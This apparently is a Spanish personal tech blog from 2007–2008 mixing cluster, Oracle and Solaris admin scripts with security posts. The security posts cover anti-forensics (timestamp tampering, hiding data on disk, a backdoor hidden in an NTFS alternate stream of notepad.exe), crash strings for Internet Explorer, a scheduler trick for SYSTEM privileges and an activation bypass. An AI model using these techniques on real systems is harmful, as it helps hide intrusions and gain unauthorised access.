/opt/VRTSvcs/bin/halogin user pass
#S1=Quien tiene la BBDD
S1=`/opt/VRTSvcs/bin/hares -state $1 |grep ONLINE |awk '{print $3}'`
S2=`hostname`

if [ $S1 != $S2 ];
then
  /opt/VRTSvcs/bin/hares -online $1 -sys $S1
fi

Parada:

#bd_shut 1.1
#vlan7 / 3-7-2008
#Para la bd pasada como parametro $1 si la bd reside en mi nodo
#
#News from 1.0 (17-6-2008) to 1.1
#Full PATH comandos cluster
#
#Ejemplo llamada:
#./bd_shut.sh grupo_bd
#
#!/bin/bash
/opt/VRTSvcs/bin/halogin user pass
#S1=Quien tiene la BBDD
S1=`/opt/VRTSvcs/bin/hares -state $1 |grep ONLINE |awk '{print $3}'`
S2=`hostname`

#Si la bd la tengo yo, la paro
if [ $S1 = $S2 ];
then
  /opt/VRTSvcs/bin/hares -offline $1 -sys $S1
fi

Exports:

#export 1.2
#vlan7 / 22-7-2008
#exports de la bd pasada como parametro $1 si el recurso $2 reside en mi nodo
#
#News from 1.1 (3-7-2008) to 1.2
#***
#News from 1.0 (17-6-2008) to 1.1
#Full PATH comandos cluster
#
#Ejemplo llamada:
#./export.sh bd grupo_bd
#
#!/bin/bash
ORACLE_BASE=/u01/app/oracle
ORACLE_HOME=/u01/app/oracle/product/9.2.0.1.0
ORACLE_SID=$1
ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data
PATH=$PATH:$ORACLE_HOME/bin:/usr/bin:/etc:/usr/ccs/bin:/usr/ucb:/usr/openwin/bin:/usr/local/bin
NLS_LANG=american_america.we8iso8859p1

export ORACLE_BASE ORACLE_HOME ORACLE_SID ORANLS33 PATH NLS_LANG
/opt/VRTSvcs/bin/halogin user pass
#S1=Quien tiene la BBDD
S1=`/opt/VRTSvcs/bin/hares -state $2 |grep ONLINE |awk '{print $3}'`
S2=`hostname`

#Si la bd la tengo yo, hago los exports
if [ $S1 = $S2 ];
then
  case $1 in
    bd_comun1|bd_comun2|bd_comun3)
      exp system/pass full=y grants=y rows=y file=/ruta/$1.dmp;;

    bd_no_comun)
      exp system/pass full=y grants=y rows=y file=/ruta/bd_no_comun.dmp;;

    bd_no_comun_2)
      exp system/pass tables='bd_no_comun2.sample_point' indexes=y grants=y rows=y file=/ruta/samplepoints.dmp;;

    *) echo "Error. bd $1 inexistente";;
  esac
fi

Veritas Cluster Server. Verificacion nodo activo

2008-07-21T11:52:00.010+02:00

Script para verificar si soy el nodo activo en el cluster VCS.

#nodo_activo_yo.sh / vlan7 / 25-6-2008
#
#Devuelve 1 si yo es el grupo activo
#Devuelve 0 si yo NO es el grupo activo
#
#Comprobar el valor de retorno consultando la variable $?
#
#Ejemplo llamada:
#./node_activo_yo.sh
#
#!/bin/bash
/opt/VRTS/bin/halogin login password
#S1=Quien es el nodo activo
S1=`/opt/VRTS/bin/hagrp -state grupo_yo |grep ONLINE |awk {'print $3'}`
S2=`hostname`

#Si yo es el grupo activo, devuelvo 1
if [ $S1 == $S2 ]
then
  exit 1
else
  exit 0
fi

Anti-forensics

2008-07-12T02:26:00.007+02:00

"Como no sabian que era imposible, lo hicieron"

El cifrado y la esteganografia pueden proteger tus datos. Esto es ya de sobra conocido asi que no dire nada.

Otro metodo seguramente conocido. Sobreescribir los datos. Cualquier wipe deberia funcionar, pero para los mas paranoicos, el mas estricto es uno que hicieron los chicos del THC, que cumplia con el analisis presentado en el siguiente documento ya clasico:

Secure Deletion of Data from Magnetic and Solid-State Memory

Peter Gutmann
Department of Computer Science
University of Auckland
pgut001@cs.auckland.ac.nz

This paper was first published in the Sixth USENIX Security Symposium Proceedings, San Jose, California, July 22-25, 1996
Published under the Creative Commons license.

http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html

La NSA considera un borrado seguro aquel que hace 30 y pico pasadas sobreescribiendo el disco. De todas formas a mi me parece exagerado para los discos duros actuales, lo de analizarlos con microscopios paso a la historia. Yo no conozco manera humana de recuperar un disco cuyos datos han sido sobreescritos una sola vez. Pero para los mas paranoicos ahi queda eso.

Bueno, ya esta bien, empecemos a hablar de asuntos serios.

Los forenses se basan muchas veces en la fecha de ultima modificacion de un archivo para deducir evidencias de backdoors, archivos troyanizados, etc.

Empecemos por Linux. Pongo como ejemplo el sistema de archivos ext3, el cual desarrollo una china muy guapa, pero eso es otro tema. ¿Linux es open source no? Bien, abramos /usr/src/linux/include/linux/ext3_fs.h

Pasteemos la parte relevante. Como diria mi amigo Kynes al hacer un modelo en ciencia: "quitemos ruido vlan7".

struct ext3_inode {
__u16 i_mode; /* File mode */
__u16 i_uid; /* Low 16 bits of Owner Uid */
__u32 i_size; /* Size in bytes */
__u32 i_atime; /* Access time */
__u32 i_ctime; /* Creation time */
__u32 i_mtime; /* Modification time */
__u32 i_dtime; /* Deletion Time */
241: __u16 i_gid; /* Low 16 bits of Group Id */

Hay mas, pero solo nos interesa ese trozo. Y de ese trozo, las 2 lineas en negrita. Tenemos 2 llamadas que podemos usar para modificar esos "stamps"

#include
#include int utime( const char * filename,
const struct utimbuf * buf);

#include int utimes( const char * filename,
const struct timeval times[2]);

O podemos usar el The Defiler's Toolkit. Incluso podriamos usar el comando touch...

¿Y en windows? El proyecto Metasploit (www.metasploit.com/projects/antiforensics) ha desarrollado una utilidad muy maja llamada Timestamp. Es valida para NTFS. Y creo que solo para NTFS.

Un inciso sobre esto. En Windows podemos evitar que se actualice la fecha de ultima modificacion de un archivo. HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate Lo ponemos a 1 y ya podemos modificar lo que queramos que la fecha de ultima modificacion no se vera alterada. Gracias Microsoft.

Esto esta a 1 por defecto en Vista,

Pasemos pagina. Hablemos ahora de esconder datos. ¿A que me refiero con esconder datos? Pues a esteganografia no, me refiero a guardar datos en sitios anormales del disco.

Linux. Podemos guardar datos en swap. Luego dicen que la swap no es importante. Tambien nos decian de canijos "el contenido de la RAM se pierde nada mas apagar el ordenador". Hace 3 meses o asi lei que un tio decia que era posible averiguar que datos habia en la RAM hasta pocos minutos despues de apagar el equipo. Era todo muy teorico y muy electronico. Ni siquiera recuerdo donde lo lei, pero parecia serio. Al grano. Linux swap. Podemos crear en la swap un segmento marcado como paginas_invalidas, bad_pages creo que dicen los guiris, y guardar nuestros datos a partir de ahi. La herramienta que yo conozco se llama Bigboo.

Seguimos en Linux. Algunos sistemas de archivos como ext2, asumen demasiadas cosas. En ext2 el i-nodo de la raiz es el numero 2, y ext2 ejemplo asume que no pueden existir bloques defectuosos antes del i-nodo de la raiz. Y algunas herramientas forenses, por lo menos el The Coroner's Toolkit ese famoso y The Sleuth Kit en UNIX asumen lo mismo y no miran ahi. Bien, creemos un bad block en el i-nodo 1 del disco. Por ejemplo, con Runefs, que forma parte de The Defiler's Toolkit.

Espacio indefinido. No se como traducir unallocated. Bien, algunas herramientas forenses solo examinan la parte del disco que esta particionada, olvidandose de la parte sin particionar. ¿Herramientas capaces de alojar datos en el espacio "unallocated" entre particiones? StegFS para Linux. Slacker de Metasploit para Win.

¿Estabamos hablando de esconder no? Sigamos. Con TrueCrypt podemos crear un segundo sistema de archivos oculto en el visible. ¿Esto por que? Porque si eres detenido y te obligan a cantar la contraseña de TrueCrypt, siempre tienes en ese sistema de archivos oculto en el habitual la informacion realmente sensible. Asi que aun te quedan esperanzas de que lo descubierto sea suficiente para tus interrogadores.

Aun hay mas. ext3 todos sabemos que es ext2+journaling. Waffen FS puede almacenar datos en el espacio reservado para journaling.

Mas comentarios breves sobre Linux. Ky FS puede guardar datos escondiendolos en directorios.

En Linux, The Defiler's Toolkit puede almacenar datos y marcar esos bloques como bad. Eso evadia a un viejo The Coroner's Toolkit, pero no a una version de 2006 o asi. The Sleuth Kit tambien es capaz de analizar datos en bad sectors.

Vayamonos a Win. NTFS. NTFS tiene una caracteristica que se llama Alternate Stream Date (ASD). ¿Que quiere decir esto? En la practica esto nos permite crear archivos en archivos. Veamoslo con un ejemplo:

c:\ type backdoor.exe >%systemroot%\notepad.exe:backdoor_muy_mala.exe

notepad.exe seguira igual. Mismo tamaño, mismo contenido. Para ejecutar nuestra backdoor:

c:\> start .\..\..\..\..\..\..\..\%systemroot%\notepad.exe:backdoor_muy_mala.exe

Y bueno, estoy cansado, esto sobre anti-forensics en sistemas de archivos por hoy. Tiene mas chicha esto, hay analisis forense en trafico de red (y anti-forense, ¿alguien recuerda Loki de phrack? Era bello eh...), hay metodos de ataque anti-forense activos como dejar de antemano el menor numero de huellas posibles, buscad en google. O acciones tan simples como usar una live-CD, o montar una particion como read-only...

Pero antes tan solo nombrar una herramienta muy maja que forma parte de Metasploit: Transmogrify. Sirve para evadir analisis de archivos modificados. Evadir al mitico tripwire. Sobre esto solo terminar con una frase: Es posible crear 2 archivos diferentes con el mismo hash MD5. ¿Y esto para que nos sirve? ¿Vosotros que pensais, que utilidad tiene esto en anti-forense?

Suerte y Exitos.

Testear FTP bash

2008-06-13T16:36:00.006+02:00

Esta codificado para testear FTP, pero es facilmente adaptable a cualquier otro servicio.

#check_ftp.sh 1.1
#vlan7 - http://vlan7.blogspot.com
#
#Based on GNUcitizen's bash portscanner
#
#News from 1.0 to 1.1 / 13-Jun-2008
#if-else en vez de 2 ifs, mas elegante, 1 comprobacion menos
#
#1.0 / 12-Jun-2008
#Chequea status FTPs
#
#Requisitos: bash
#
#Entrada: ftps.txt
#
#Salida: Escribe en salida estandar "FTP  OK" / "FTP  *NO* OK"
#
#Formato Entrada: Un server FTP por linea
#
#Nota: Para escanear otros puertos puede ser necesario mandar logout / exit en vez de quit
#
#!/bin/bash
for host in $(cat ftps.txt) ; do
  if echo -en "o $host 21\nquit\n" |telnet 2>/dev/null |grep 'Connected to' >/dev/null; then
    echo -en "FTP $host OK\n";
  else
    echo -en "FTP $host *NO* OK\n";
  fi
done

Win juego Corazones. Ver cartas de los oponentes

2008-05-16T09:32:00.003+02:00

HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts

Crear un nuevo valor con nombre ZB de tipo string y valor 42

Pulsando CTRL+ALT+MAYUS+F12 deberiamos ver las cartas de los oponentes.

Logearse en un windows cuyo periodo de activacion ha expirado

2008-05-14T17:01:00.006+02:00

Si no activas win en 30 dias, este expira y no nos deja iniciar sesion.

En la pantalla de login, selecciona un usuario.

Dara error y nos dira que win ha expirado y que si queremos activarlo. Di que si.

Minimiza (no cierres) la pantalla de "Vamos a activar Windows".

Tecla de Windows + U

Se abre el programa narrador (accesibilidad para vision pobre).

Haz click en el pequeño icono de ordenador que aparece en la esquina superior izquierda de la ventana.

Se nos abrira la pantalla de "Acerca de".

Fijate que hay un link a la pagina de Microsoft. Pincha en el.

Uau, acceso a Internet :)

Tambien puedes acceder a tus archivos introduciendo como direccion C:\

Intentar iniciar el proceso explorer.exe en XP para tener barra de abajo no sirve de mucho, pues se cierra a los pocos instantes. Pero me han dicho que Vista no finaliza el proceso explorer.exe, hecho que no he podido confirmar.

Que lo disfruteis.

Solaris. Creando un servidor local para pkg-get

2008-05-06T17:53:00.008+02:00

Todo lo de la entrada anterior esta muy bien, pero resulta que en el trabajo, en un cliente, los servidores no pueden tener acceso a internet por motivos de seguridad.

Tenia que instalar OpenSSH para Solaris 8. Bajando paquetes de sunfreeware.com tenia problemas con una libreria: libcrypto. La dependencia OpenSSL me instalaba una version anterior de la libreria, aun instalando la ultima version de OpenSSL.

Instalar libgcc e incluir la ruta de las librerias en la variable de entorno LD_LIBRARY_PATH ademas de intentar engañar al sistema creando un enlace blando a la vieja version con el nombre de la nueva... no sirvio de nada.

Vi que los chicos de Blastwave daban la opcion de instalar paquetes con pkg-get desde un cdrom, pero costaba dinero ese DVD.

pkg-get permite especificar /cdrom/cdrom0/paquete , asi que pense en editar la ruta del "repositorio" en el archivo de configuracion de pkg-get para que la url apuntara a la ruta local de mi directorio donde tenia el paquete openssh bajado de http://blastwave.solaris-fr.org/

La primera en la frente, me di cuenta de que iba a buscarlos a sparc/5.8

Bien, movi el paquete a sparc/5.8 dejando la ruta del archivo de configuracion como estaba, y la segunda en la frente. Faltaba el catalogo.

Buscando en google encontre una pagina (http://www.sunfreeware.com/pkg-get.html) con el archivo BOLTpget.pkg que me dispuse a bajar y a instalar en el sistema con

pkgadd -d BOLT*

Actualice (cree) el catalogo:

pkg-get -U

Probe de nuevo a hacer un pkg-get -i openssh pero me fue pidiendo archivos necesarios para todo "repositorio" de pkg-get.

Me pidio el archivo catalog y luego el archivo descriptions , que me propuse a bajar de la URL que mencione antes y colocarlos en sparc/5.8

Luego me fue pidiendo dependencias continuamente, y tuve que ir bajando una a una a base de prueba y error. Estas fueron las que me pidio:
common* , openssl* , zli^b* , tcpwrappers* y krb5*

Cuando hube bajado todas, por fin quedo instalado OpenSSH.

P.D. Los malos chicos de Blastwave permiten especificar /cdrom/cdrom0 como "repositorio" local, pero ningun otro directorio mas. Afortunadamente el servidor tenia instalado el daemon de ftp, asi que pude poner en el archivo de configuracion de pkg-get lo siguiente:

url=ftp://root:clave@127.0.0.1/tmp/openssh

Instalacion de paquetes en Solaris 8/9

2008-05-05T10:38:00.009+02:00

Una especie de APT / Portage para Solaris 8/9.

Para info sobre Solaris 10, visitar http://www.blastwave.org

1. Verificamos que tenemos los parches necesarios:

showrev –p |grep <num>

Donde <num> es:

Solaris 8 Sparc: 110934
Solaris 8 x86: 110935
Solaris 9 Sparc: 113713
Solaris 9 x86: 114568

Si no lo tenemos, instalar con patchadd el ultimo cluster mas las ultimas revisiones.

2. Bajamos pkg-get a /tmp:

http://www.blastwave.org/pkg_get.pkg

3. Instalamos pkg-get:

pkgadd –d /tmp/pkg_get.pkg all

[y]es a todo

4. Bajamos wget:

Para Sparc:

http://www.blastwave.org/wget-sparc.bin

Para x86:

http://www.blastwave.org/wget-i386.bin

5. Lo movemos a /tmp renombrado a wget:

mv wget-sparc.bin /tmp/wget

6. Damos permisos de ejecucion:

chmod 755 /tmp/wget

7. Incluimos /tmp y /opt/csw/bin en el PATH temporalmente:

PATH=/tmp:/opt/csw/bin:$PATH
export PATH

8. Verificar que en /opt/csw/etc/pkg-get.conf tenemos la URL de un "repositorio":

Por defecto url=http://ibiblio.org/pub/packages/solaris/csw/unstable

Lista de mirrors en http://www.blastwave.orc/mirrors.php

9. Instalamos wget:

pkg-get –i wget

10. Borramos el binario de wget antiguo:

rm /tmp/wget

11. Corregimos el PATH actual borrando /tmp:

PATH=`echo $PATH |sed 's#\/tmp:##g'`:$PATH
export PATH

12. Incluimos /opt/csw/bin en el PATH del usuario que necesite instalar paquetes. En el .profile de su $HOME

13. Instalamos paquete:

pkg-get –i paquete

Oracle. Multiplexando el archivo de control

2008-04-25T12:43:00.005+02:00

Para tolerancia a fallos, tras la creacion de nuestra bd, es recomendable hacer una copia de seguridad del archivo de control a otro disco duro del sistema.

Lo normal es usar SPFILE (binario), y solo convertirlo a PFILE (texto) cuando queremos consultarlo. Con SPFILE estos serian los pasos.

1. Hacer un alter (referenciar el archivo de control original y los multiplexados -copias-) en el SPFILE:

ALTER SYSTEM SET control_files = '$HOME/ORADATA/u01/ctrl01.ctl', '$HOME/ORADATA/u02/ctrl02.ctl' SCOPE=SPFILE;

2. Parar la bd:

shutdown inmediate

3. Crear el/los archivo/s de control adicional/es:

cp $HOME/ORADATA/u01/ctrl01.ctl $HOME/ORADATA/u02/ctrl02.ctl

4. Arrancar la bd:

startup

Al arrancar la bd, se leera el SPFILE, y el servidor Oracle mantendra todos los archivos de control listados en el parametro CONTROL_FILES.

Ataque fisico a un switch

2008-04-09T16:59:00.009+02:00

Diria que poca gente sabe esto, pero basta conectar cada extremo de un cable directo a un par de bocas de la pared para conseguir causar un DoS al switch hacia donde van conectadas esas bocas.

Puedes tener el CPD bajo llave, o seguridad biometrica para acceder al CPD, pero date cuenta de que basta un solo cable directo para que un desaprensivo nos tire un switch en nuestra organizacion. Da igual que sea Cisco.

Como alguno me ha comentado, para evitar eso existe Spanning-Tree, mediante el cual podemos usar topologias fisicas redundantes libre de bucles.

El problema de lo que comentaba es el broadcast, y si los switches no soportan Spanning Tree, DoS al switch. Basta que un switch no admita STP para que nos hagan un DoS a la red. Y no solo se cae el switch y la red, si tenemos equipos Win98, pantallazo azul.

Lo primero que hay que hacer para asegurar un switch es deshabilitar siempre los puertos que no se usan.

Si por algun motivo no se pueden desactivar los puertos que no se usan de un puente raiz, todos los puertos libres en el switch raiz o en el secundary root debemos protegerlos con un root guard.

Con estas dos medidas, si nos conectan o un simple cable directo, no pasara nada, pues no tendran conectividad con el puente raiz y/o no perteneceran a la topologia STP.

STP siempre bloquea al menos un puerto para datos (el broadcast para un switch es trafico de datos) por lo que la tormenta de broadcast se contiene independientemente de que el coste hacia el puente raiz sea identico por todos los caminos.

Si se conecta un cable directo de un puerto del switch raiz a otro puerto del mismo switch, sin STP seguro que cae, con STP activado habria que verlo, lo mejor es desactivar los puertos que no usamos.

Windows. Entrar como SYSTEM

2008-04-07T10:20:00.004+02:00

En Windows el programador de tareas se ejecuta con privilegios de SYSTEM (mas que Administrador).

at XX:XX /interactive "cmd.exe"

Cuando se cargue el cmd, Finalizamos el proceso explorer.exe

En el cmd escribimos:

explorer.exe

Y ya tenemos privilegios de la cuenta SYSTEM.

Cerramos el cmd. Y si abrimos uno nuevo y escribimos

%username%

Nos devolvera SYSTEM.

Para evitar que nuestros usuarios hagan esto, si estamos en un dominio, podemos deshabilitar el uso del programador de tareas mediante una directiva de grupo.

Windows: Bloquear de manera efectiva parasitos (*ware, virus...) de sitios dudosos

2008-03-28T21:14:00.007+01:00

Podemos usar el archivo hosts para bloquear pop-ups de publicidad, banners, cookies de terceros, bugs de webs, spyware y hasta casi todos los hijackers.

En windows al realizar una resolucion de nombres, por defecto se lee primero el archivo hosts, y solo si tras leerlo el sistema no es capaz de resolver de nombre a IP, entonces consultamos a los servidores DNS que tengamos configurados.

Bien, si en el archivo hosts yo incluyo una linea tal que asi:

127.0.0.1 ad.doubleclick.net

¿Que es lo que ocurre?

Que conseguimos bloquear todos los archivos que nos intente transferir ese servidor DoubleClick que estamos viendo. Esto tambien nos protege de que el servidor pueda trazar lo que hacemos. En la Internet de hoy en dia es comun que servidores publicitarios como DoubleClick y muchos mas intenten abrir una conexion distinta a la pagina web que estamos viendo.

¿Tenemos que editar linea a linea el archivo hosts de nuestro Windows?

No. Nadie deberia tener que resolver un problema 2 veces. Y ya hay gente que se ha dedicado a recopilar estos sitios maliciosos con la ayuda de todos los usuarios de Internet.

El que yo uso es este:

http://www.mvps.org/winhelp2002/hosts.htm

Suele ser actualizado muy a menudo. En el momento de escribir esto es dia 28-Marzo-2008, y la ultima actualizacion a dia de hoy es del 9-Marzo-2008.

Se trata de un archivo comprimido que viene con un bat. Pero ese bat funciona mal, por ejemplo si abres el archivo comprimido y simplemente haces doble click en el .BAT

Yo lo que recomiendo es sobreescribir nuestro archivo hosts con el archivo hosts que estos buenos chicos nos proporcionan.

¿Donde esta el archivo hosts?

Depende de la version de Windows.

Windows 2K - C:\WINNT\SYSTEM32\DRIVERS\ETC
Windows XP - C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows Vista - C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Win 98/ME - C:\WINDOWS

Usuarios de Vista, leed esto: http://www.mvps.org/winhelp2002/hostsvista.htm

¿Como? ¿Que ya no ves algo que antes veias?

Simplemente edita el archivo hosts y borra la linea que haga referencia al servidor que ya no ves.

Tengo la clave WEP pero DHCP esta desactivado

2008-03-18T15:44:00.008+01:00

O metodo prueba y error, o...

-Wireshark
-Edit / Preferences / Protocols / IEEE 802.11
-Assume packets have FCS
-Clave WEP
-Capture packets in promiscuous mode
-Enable network name resolution
-Disable MAC name resolution
-Filtro: (wlan.bssid == bssid_AP) && (tcp)

Como colgar IE

2008-03-18T15:29:00.006+01:00

Todas estas maneras funcionan para IE6, y algunas para IE7.

1. <STYLE>@;/* Source
2. <input type crash> Source
3. <body onLoad="window()"> Source
4. <style>*{position:relative}</style><table><input></table> Source
5. <script>for (x in document.write) { document.write(x);}</script> Source
6. Event handler crash. Source
7. Ordered list crash. Hay que hacer click en el primer item de la lista. Source
8. function getX( oElement )
{
var iReturnValue = 0;
while( oElement != null ) {
iReturnValue += oElement.offsetLeft;
oElement = oElement.offsetParent;
}
return iReturnValue;
}

BJBT 0.3.0.0, Por mi amigo chanchi

2008-02-13T11:27:00.006+01:00

Mi amigo chanchi me envia la ultima version de su cliente de BitTorrent que presentara como Proyecto de Fin de Carrera. Es la version 0.3.0.0 y os podeis bajar este programa de nivel de AQUI.

Tambien se ha currado un mega PDF de documentacion de ¡557 paginas!, que evidentemente, no lo hace publico al menos hasta que presente su PFC.

Si quereis los fuentes .java vienen dentro de JAR. Desde el directorio java\jdk :

jar xf BJBT-0.3.0.0.jar

Muchas gracias chanchi, eres un crack tio :)

Windows: Defensa ante ataques de enumeracion de usuarios o recursos compartidos

2008-01-30T20:04:00.002+01:00

No he hablado aqui de lo sencillo que es realizar un ataque contra un controlador de dominio, en el mas jugoso de los casos, de forma que estableciendo lo que se conoce como una sesion nula, podamos obtener muchisima informacion sobre usuarios y recursos compartidos de un sistema.

Con esta info, y sabiendo cosas como que el SID del usuario Administrador en Windows siempre acaba en 500, o conociendo algun nombre por defecto de algunos grupos que hay en un dominio, y combinando todo esto con herramientas como user2sid / sid2user, un atacante lo tiene mas sencillo para lograr una escalada de privilegios en nuestros sistemas.

No me apetece explicar el ataque sino la defensa.

Por defecto cualquier Windows permite la enumeracion de usuarios y recursos compartidos, lo cual me parece lamentable.

Podemos asegurar un poco mas nuestros sistemas manipulando el valor de la siguiente clave de registro:

HKLM\SYSTEM\CurrentControlSet\Control\
LSA

La clave se llama RestrictAnonymous

Admite 3 posibles valores:

0 Permisos por defecto, es decir, damos toda la info. Patetico.
1 No permitir enumeracion de usuarios SAM / recursos compartidos.
2 Acceso prohibido a menos que permitamos especificamente acceso anonimo.

Yo en todos los manuales de seguridad que he leido, papers serios incluso, he visto que directamente recomiendan usar el valor 2. Pero yo recomendaria establecer el valor 1, que si bien no protege totalmente contra un ataque de enumeracion, si que impide hacerlo estableciendo una sesion nula, etc, etc. Esto es lo que podria saber el 99% de los atacantes. Lo tipico.

¿Por que yo no recomiendo establecer el valor 2?

Porque a pesar de ser mas seguro, nos quita demasiadas funcionalidades como para que la balanza seguridad/perdida de funcionalidades se incline hacia el lado de la seguridad.

¿Como cuales? Que esto es lo que no he leido en ningun manual, incluso he leido que Microsoft recomienda establecer el valor 2...

-Ningun equipo miembro del dominio que sea inferior a Windows 2000 podra establecer un canal seguro en la comunicacion con el servidor.

-Ningun controlador de dominio degradado aunque este en un dominio de confianza podra establecer un canal seguro net logon contra el controlador de dominio.

-Usuarios de Windows NT o MAC no podran cambiar su contraseña cuando esta caduque.

-En "Mis sitios de red" dejaras de poder ver los equipos de la red, a menos que no este establecido el valor 2 en alguno de estos equipos: el master browser del dominio, el master browser o el backup master browser.

No se de ningun efecto secundario mas... ¿alguien conoce alguno mas? Lo de siempre, creditos a ti si me sorprendes... :)

Ahora como conclusion una pregunta...

¿Y en un controlador de dominio que corra bajo Samba bajo UNIX? ¿Existen estos problemas de sesiones nulas, etc?

¿Cuestion de probar un ataque de enumeracion de usuarios contra un DC powered by Samba bajo UNIX/Linux no?

:)

Grave vulnerabilidad Data Disclosure en Wordpress

2008-01-21T12:07:00.006+01:00

En todas las versiones de wordpress hasta la fecha descubri que existe un fallo de diseño que permite a los usuarios registrados ver las IPs y los mails (estos ultimos si han sido introducidos) de todos los usuarios que hayan hecho algun comentario.

Basta con logearse e ir a la opcion Comentarios o a la opcion Administrar y ahi pinchar en cualquier numero de los comentarios para ver estos datos sensibles.

Googleando descubri un plugin hecho por Kaf Oseo, pero solo solucionaba el problema si entrabamos por la opcion de comentarios. Por la opcion administracion seguia sin resolver el problema. Ademas lo hacia reduciendo la funcionalidad del blog en wordpress, pues lo hacia a costa de reducir los privilegios de los usuarios de Autor a Colaborador.

Gracias a mis ideas, mi amigo Javitxu mejoro el plugin que yo le mostre.

Podeis bajarlo de AQUI

En nuestra modificacion del plugin original de Kaf Oseo explicamos un poco por encima las modificaciones hechas para mejorarlo.

Hasta la fecha, nuestro plugin es el mejor para solucionar estos 2 graves fallos de diseño de Wordpress. ¿Algun hacker dispuesto a hacernos lo que los angloparlantes llaman hack the hack? Somos todo oidos... :)

Keep the good work folks.

P.D. He dejado el siguiente mensaje en el hilo correspondiente de los foros oficiales de Wordpress (http://wordpress.org/support/topic/143772:

My friend Javitxu and me have developed a full solution based in Kaf Oseo plugin because it's GPL.

I've wrote a post in my personal blog ( UNIX & CISCO & HACKS ) with a link to the improved wordpress plugin. The post is dated January 21, 2008.

Any ideas would be appreciated.

Best regards,

Keep up the good work folks.

vlan7

Bit Torrenet 0.1.11 Por mi amigo chanchi

2007-12-12T12:23:00.004+01:00

Mi amigo chanchi me manda un mail diciendome:

Hola vlan7,

Aqui va mi version 11 dias despues, quizas pase el visto bueno del profesor

chanchi

Podeis descargarlo de AQUI

Muchas gracias chanchi por enriquecer una vez mas mi blog con un programa avanzado :)

Bit Torrenet 0.1.1 Por mi amigo chanchi

2007-11-26T15:25:00.005+01:00

Mi amigo chanchi se ha currado como Proyecto de Fin de Carrera un cliente BitTorrent.

Me envia un mail diciendome:

Hola vlan7,

Bueno llevaba 31 dias programando (versión 0.0.31), hoy es el dia 32, versión 0.1.1.

Va muy lento mi programa y cualquier cliente bitTorrent cutre se pone a maxima velocidad y te chupa todo el ancho de banda. Tengo que investigar que pasa.

El tutor del proyecto muy bien, me hablo de sustituir System.out.println por una clase llamada Salida que escribiese por consola, fichero o textarea de la ventana.

Tambien me dijo de hacer herencia para no repetir codigo en 3 clases que tengo para tres controles de interfaz JTable

Me hablo de hacer una clase Idioma, y de hacer un fichero de preferencias, un (*.propierties) que maneja muy bien el JAVA donde almacenar cosas como las opciones de los menus: host/puerto PROXY, puerto que acepta conexiones, directorio de compartidos/download.

Así que tengo que hacer los siguiente:

- Mejorar la velocidad de download
- Abro muchos sockets de golpe, muchas conexiones y se pierden por TIMEOUT muchas, tengo que poner un limite de conexiones por segundo antes de hacer el HANDSHAKE.
- Poner limite de UPLOAD en KB para que pueda hacer mas peticiones de datos y mejorar mi velocidad DOWNLOAD
- Meter IDIOMA
- Meter clase Salida con metodos que escriban en fichero/consola segun tu decidas
- Meter fichero que guarde la configuracion .propierties

Muchas gracias por ayudarme con crear una INSTALACION para mi programa. Dentro de 15 dias cuando este mas descargado de trabajo te pido ayuda con el programa adminstudio.

(me ofreci a crearle un instalador con Adminstudio)

Tambien me hablo del JAVADOC y de como comentar los metodos JAVA para generar documentacion con el JAVADOC que luego se pasa a WORD con el Rose/Enterprise Architect que son aplicaciones de Metodología UML.

Mi amigo de birras de hace ya 20 años que es mi Tutor (ya hizo la tesis y es doctor) tiene mi misma edad, estudiamos desde EGB hasta la carrera juntos.

Fue muy positivo, y me dijo que los alumnos de la media estan los 3 años programando en JAVA y que yo llevaba 10 años sin programar. Que hace dos meses no sabia lo que era un
try{
}
Catch (Excepction e)
{}

Y bueno me dijo tb que habia que observar mis circunstancias que yo sali de la carrera hace 8 años. vlan7, yo te digo que le saque muy poca rentabilidad economica a todos los creditos de las casi 40 asignaturas anuales que aprobe. Hay gente que con la carrera y un poco mas se gana la vida sin ser cientificos, solo programadores del monton.

Tambien me dijo que en la de 3 años hay gente que presenta como proyecto cosas de Gestion (Bibliotecas, Video-clubs), un monton de gente haciendo portales o carritos de la compra. Que se repetian proyectos. Creo que nadie hizo un BitTorrent en la carrera superior o media. No es que sea muy complejo pero bueno las comunicaciones hay que sincronizarlas, es mas dificil la inteligencia artificial o andar haciendo
compiladores/traductores. Pero bueno tiene un punto mas de dificultad que la gestion o la programación WEB. Aunque ahora andan con el AJAX alguna gente haciendo virguerias en WEB.

Bueno a ver si dentro de 1 mes ya tenemos programita rapido, con opciones, que maneje varios Torrentes a la vez y que tenga instalacion.

Asi me gusta chanchi, el baudio es nuestro tio... Y de la instalacion me encargo yo chanchi, cuenta conmigo :)

Dentro de 15 dias te paso otra version mas eficiente, si quieres los .java vienen dentro de JAR. Desde el directorio java\jdk-> jar xf BJBTBeta.jar

Saludos
chanchi

Muchas gracias chanchi por permitirme poner tu cliente de BitTorrent y asi elevar el nivel de mi blog personal.

Seguimos en contacto amigo.

Os podeis bajar el .JAR de aqui: BJBTBeta.jar

¿Es necesario el espacio swap si tenemos mucha RAM?

2007-10-24T17:35:00.002+02:00

Un comentario hecho por Anonimo en mi entrada Ampliar tamaño swap (II) me ha hecho escribir este post.

Anonimo me comentaba que habia leido que no era necesaria una particion swap si disponemos de 2 GB de RAM, a lo que yo le conteste lo siguiente:

Todo depende del uso que vayas a hacer de la maquina. Yo he "jugado" con varias distros de linux sin swap con 768MB de RAM, y no he tenido ningun problema.

De hecho, hasta donde yo se, todas las live-CD funcionan sin swap.

Pues bien, a mi se me ocurre al menos un caso en el que nos interese tener swap aunque dispongamos de 2GB de RAM.

Si no tienes espacio swap, y digo espacio y no particion, pues la swap puede residir en un archivo, no podras hibernar el sistema.

Con hibernar me refiero a suspender a disco, no solo suspender a secas. Suspender a disco supone grabar en el disco la imagen de la memoria, y apagar todos los elementos del ordenador, por lo que en gasto de energia es igual que si lo apagases, no gasta nada. Suspender, a secas, lo que hace es suspender a ram, y eso si que gasta energía, aunque poca, siendo algo mas lento que un reinicio.

Casi todos los portátiles suspenden bien a ram con Linux, y algunos lo hacen a disco, aunque haya que hacer algun hack.

